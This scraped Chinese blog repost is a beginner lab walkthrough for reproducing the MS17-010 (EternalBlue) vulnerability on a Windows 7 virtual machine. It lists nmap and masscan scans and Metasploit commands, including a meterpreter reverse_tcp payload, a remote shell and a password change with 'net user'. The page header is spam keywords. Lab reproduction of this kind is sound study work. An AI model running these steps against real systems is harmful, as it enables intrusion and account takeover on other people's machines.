日韩性视频-久久久蜜桃-www中文字幕-在线中文字幕av-亚洲欧美一区二区三区四区-撸久久-香蕉视频一区-久久无码精品丰满人妻-国产高潮av-激情福利社-日韩av网址大全-国产精品久久999-日本五十路在线-性欧美在线-久久99精品波多结衣一区-男女午夜免费视频-黑人极品ⅴideos精品欧美棵-人人妻人人澡人人爽精品欧美一区-日韩一区在线看-欧美a级在线免费观看

歡迎訪問 生活随笔!

生活随笔

當前位置: 首頁 > 编程资源 > 编程问答 >内容正文

编程问答

MS17-010漏洞复现(带win7虚拟机安装,零基础)

發(fā)布時間:2023/12/31 编程问答 30 豆豆
生活随笔 收集整理的這篇文章主要介紹了 MS17-010漏洞复现(带win7虚拟机安装,零基础) 小編覺得挺不錯的,現(xiàn)在分享給大家,幫大家做個參考.

WIN7虛擬機安裝

1.先下載win7原裝鏡像

MSDN, 我告訴你 - 做一個安靜的工具站

然后打開VM,把虛擬機安裝進來

1.選擇自定義(高級)

?2.選擇默認的

3.選擇稍后安裝系統(tǒng)

4.選擇windows操作系統(tǒng)和 Win7版本

5.選擇合適位置

?6.選擇BIOS

?7.選擇處理器數(shù)量

?8.選擇內存大小

?9.選擇網(wǎng)絡類型為NET

之后都選擇默認就可以了

10.

成功完成基礎設置

在CD/DVD中選擇我們之前下載的鏡像文件

1.

?2.

點擊確定開機

?然后點擊安裝

點擊接受和下一步

?點擊自定義(高級)

?

?等待完成安裝重啟

取名為admin

?隨便輸入一個密碼,不記得都可以

跳過

?使用推薦配置,家庭網(wǎng)絡?

?成功進入后重啟

?開始復現(xiàn)永恒之藍漏洞(裝好win7 64位可以直接跳到這一步)

1、掃描局域網(wǎng)內的C段主機(主機發(fā)現(xiàn))

輸入命令:

nmap -sP 192.168.159.1/24

得到主機ip

192.168.159.141

2、掃描端口獲得運行的服務

nmap:

nmap -p 1-65535 -A 192.168.159.141

masscan:

masscan --rate=10000 -p1-65535 192.168.159.141

?掃描到開放了445端口,而永恒之藍利用的就是445端口的smb服務,操作系統(tǒng)溢出漏洞,這代表我們可能可以利用永恒之藍漏洞

?3.進入MSF控制臺

命令:

msfconsole

尋找永恒之藍漏洞:

search ms17-010

3是永恒之藍掃描模塊,探測主機是否存在永恒之藍的漏洞

1是永恒之藍的攻擊模塊,借此攻擊目標用戶

我們先要掃描目標是否存在永恒之漏洞

輸入命令

use 3

或者

use auxiliary/scanner/smb/smb_ms17_010?

然后查看該模塊所需要的參數(shù)配置?

show options

?若Required欄為yes則代表該參數(shù)需要填寫

設置RHOST(攻擊目標的ip)

set rhosts 192.168.159.141

執(zhí)行掃描?

run

?Host is likely VULNERABLE to MS17-010

顯示主機很可能能夠會受到永恒之藍漏洞的攻擊,代表我們現(xiàn)在可以攻擊

開始攻擊

使用攻擊模塊:

use 1

設置payload

set payload windows/x64/meterpreter/reverse_tcp

查看需要配置參數(shù)

show options

設置目標攻擊ip(Win7主機的ip)?

set rhosts 192.168.159.141

設置接受shell的ip(攻擊機ip,kali的ip)?

set LHOST 192.168.159.88

執(zhí)行攻擊

run

成功拿到權限

查看系統(tǒng)版本

sysinfo

?修改密碼

shell

顯示本地計算機的所有用戶帳戶列表:

net user

該命令用于增加或修改系統(tǒng)用戶,以及查看它們的信息。

修改密碼

net user admin 新密碼

net user admin 123456

?成功用123456登入

?到這里就完成了基礎的滲透

總結

以上是生活随笔為你收集整理的MS17-010漏洞复现(带win7虚拟机安装,零基础)的全部內容,希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網(wǎng)站內容還不錯,歡迎將生活随笔推薦給好友。